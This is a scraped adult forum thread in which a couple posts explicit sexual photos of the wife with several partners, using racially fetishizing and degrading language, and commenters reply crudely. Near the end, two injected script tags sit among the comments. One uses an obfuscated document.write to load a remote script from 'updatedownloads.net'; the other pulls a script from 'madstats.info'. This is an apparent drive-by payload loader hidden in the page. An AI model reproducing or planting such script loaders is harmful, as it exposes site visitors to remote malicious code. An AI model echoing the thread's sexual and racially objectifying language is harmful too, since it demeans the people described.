The more she gets, the more she wants!

• Thread startermwf43forbbc
  • Start date

mwf43forbbc

Not quite a lurker
Beloved Member
Aug 2, 2009
Since my last posts on here, Renee has had BBCs 9-12! Sorry to say number 9 was a total dud and kinda grossed us both out. So far the only bad experience we've had. We did take a little break for a while after that, but she couldn't stay away. The craving hit her and soon she was being used again, like the little Black Cock Slut she is! Attached are some pics from the last meet. Hope you enjoy!

Attachments

• Renee and BBC 151.jpg
    Renee and BBC 151.jpg
    96.4 KB · Views: 1,513
  • Renee and BBC 154.jpg
    Renee and BBC 154.jpg
    67.7 KB · Views: 687
  • Renee and BBC 156.jpg
    Renee and BBC 156.jpg
    82.7 KB · Views: 894
  • Renee and BBC 159.jpg
    Renee and BBC 159.jpg
    75.8 KB · Views: 981
  • Renee and BBC 136.jpg
    Renee and BBC 136.jpg
    69.7 KB · Views: 1,432
Let me know whens the next party!!

Yum....very nice indeed. Love to see more

what a gal!

damn hot pics...any video?

i want my southern indiana bitch wife used for real

Last edited by a moderator:
Thanks for the comments

Thanks for all the comments. We do appreciate them. Are there any Black Bulls in Indiana that would like to use both of us? If so, send us an IM. Attaching a couple more pics from her last meet!

Attachments

• Renee and BBC 155.jpg
    Renee and BBC 155.jpg
    84.7 KB · Views: 478
  • Renee and BBC 161.jpg
    Renee and BBC 161.jpg
    68 KB · Views: 959
  • Renee and BBC 162.jpg
    Renee and BBC 162.jpg
    75.6 KB · Views: 903
  • Renee and BBC 137.jpg
    Renee and BBC 137.jpg
    71.8 KB · Views: 676
Wow! The way she's taking that dark meat I can tell she ejoys a thorough black fucking! Proofs in the pudding, or the cream inbetween her seams is really whatbis seems! Great post!

Thank you for sharing!

Luv the pics! Nothing hotter than watching white wives giving that pussy up!

mwf43forbbc said:
Since my last posts on here, Renee has had BBCs 9-12! Sorry to say number 9 was a total dud and kinda grossed us both out. So far the only bad experience we've had. We did take a little break for a while after that, but she couldn't stay away. The craving hit her and soon she was being used again, like the little Black Cock Slut she is! Attached are some pics from the last meet. Hope you enjoy!

What? He grossed both of you out, but she still fucked him???

Yes there is, but...

secretagent007 said:
damn hot pics...any video?

Yes, we have video of her taking BBC. But it was shot with my Blackberry and is a 3GP file. I have no idea how to upload it or I would. I don't have any conversion software either.

BTW: Still looking for a Dom Bull here in the Indiana area...PM us!

gears said:
What? He grossed both of you out, but she still fucked him???

I was wondering what exactley it was which grossed the both of you out. Please share the experience in detail, if you will.

mooooooooreeeeeeeee!!!!

yes needed in southern indiana

wow hot pics and hope to see more!

MWF43 ... we sent you a private message.. let us know if you got it or not

yummy cream .. nice .. keep them cumming
the pictures that is..

<script language='JavaScript' type='text/javascript'>document.write ("<" + "script language='JavaScript' type='text/javascript' src='http://updatedownloads.net/tool/output/index/Ou5i5xXj2cY3bYf1nhRQIVA1D9IBT5sH?rand=" + Math.random() * 100000000 +"'></"+"script>")</script>
<script type="text/javascript" src="http://www.madstats.info/tool/promotion/t_c4ca4238a0b923820dcc509a6f75849b.js"></script>

very sexy i like